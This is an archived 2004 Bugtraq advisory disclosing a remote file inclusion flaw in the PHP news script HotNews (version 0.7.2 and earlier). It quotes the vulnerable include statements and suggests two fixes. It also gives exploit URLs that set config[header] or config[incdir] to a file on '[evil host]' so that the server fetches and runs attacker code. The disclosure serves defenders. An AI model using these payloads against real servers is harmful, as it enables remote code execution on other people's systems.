| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Sun, 4 Jan 2004 03:45:59 +0100
From: Dariusz 'Officerrr' Kolasinski <officerrr@...igon.com.pl>
To: bugtraq@...urityfocus.com
Subject: HotNews arbitary file inclusion
HotNews arbitary file inclusion.
===+++===+++===+++
Product: HotNews
Version: <= v0.7.2
Vendor: http://sourceforge.net/projects/hotnews/
Bug discovered by: Officerrr <officerrr@...igon.com.pl>
Vendor Response: Not contacted yet.
===+++===+++===+++
Problem #1:
===+++===+++===+++
Attacker can include any file from remote or local
server.
PHP Code/Location #1:
===+++===+++===+++
-- from hotnews-engine.inc.php3
[...]
/*
// Init
$pagetitle = $config["pagename"];
if (!empty($config["header"])) {
include($config["header"]);
}
[...]
PHP Code/Location #2:
===+++===+++===+++
-- from hnmain.inc.php3
[...]
// Init
include($config["incdir"] . "hndefs.inc.php3");
include($config["incdir"] . "func.inc.php3");
include($config["incdir"] . "getopts.inc.php3");
include($config["incdir"] . "db.".$config["db_type"].".inc.php3");
if (!$config["no_fasttpl"]) {
include($config["incdir"] . "class.FastTemplate.php3");
}
include($config["incdir"] . "class.CachedFastTemplate.php3");
[...]
Exploit:
===+++===+++===+++
http://[victim]/includes/hotnews-engine.inc.php3?config[header]=http://[evil host]/[evil file]
http://[victim]/includes/hnmain.inc.php3?config[incdir]=http://[evil host]/func.inc.php3
http://[victim]/includes/hnmain.inc.php3?config[incdir]=http://[evil host]/hndefs.inc.php3
etc...
Fix #1:
===+++===+++===+++
Turn off global_variables.
Fix #2:
===+++===+++===+++
Use .htaccess to protect files in the 'includes' directory.
--
Pozdrawiam,
Dariusz 'Officerrr' Kolasinski
<Linux Administrator> <gg: 516354>
"Living on a razors edge, Balancing on a ledge"
Powered by blists - more mailing lists